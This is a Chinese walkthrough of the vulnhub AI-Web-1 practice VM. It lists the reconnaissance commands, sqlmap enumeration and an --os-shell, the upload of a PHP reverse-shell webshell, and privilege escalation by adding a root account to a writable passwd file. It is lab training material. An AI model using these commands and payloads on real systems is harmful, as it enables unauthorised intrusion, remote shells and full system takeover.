本周实践的是vulnhub的AI-Web-1镜像,
下载地址,https://download.vulnhub.com/aiweb/AI-Web-1.0.7z,
用workstation导入成功,
做地址扫描,sudo netdiscover -r 192.168.220.0/24,
获取到靶机地址是192.168.220.168,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.220.168,
发现靶机有80端口的http服务,以及两个路径,
/m3diNf0和/se3reTdir777/uploads,
对/m3diNf0进一步做路径暴破,
dirb http://192.168.220.168/m3diNf0,
浏览器访问http://192.168.220.168/m3diNf0/info.php,
浏览器访问http://192.168.220.168/se3reTdir777,
上burpsuite,截获请求数据,保存在文件中,req.txt,
暴破数据库,sqlmap -r req.txt --dbs --batch,获取到aiweb1,
获取os-shell,sqlmap -r req.txt -D aiweb1 --os-shell,
其中一步输入的是/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads,
尝试在os-shell下执行命令,确认当前权限passwd文件可写,
写入root权限的账号信息,但是无法切换,
浏览器访问http://192.168.220.168:80/se3reTdir777/uploads/tmpuetdh.php,发现是一个可以上传文件的入口,
本地准备一个webshell脚本,
cat /usr/share/webshells/php/php-reverse-shell.php,
修改地址和端口,保存成shell.php,上传,
浏览器访问http://192.168.220.168/se3reTdir777/uploads/shell.php,
获取到反弹shell,发现之前在os-shell下给passwd文件的写入没生效,
重新给passwd文件写入root权限的账号信息,切换账号,确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之AI-Web-1的实践
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论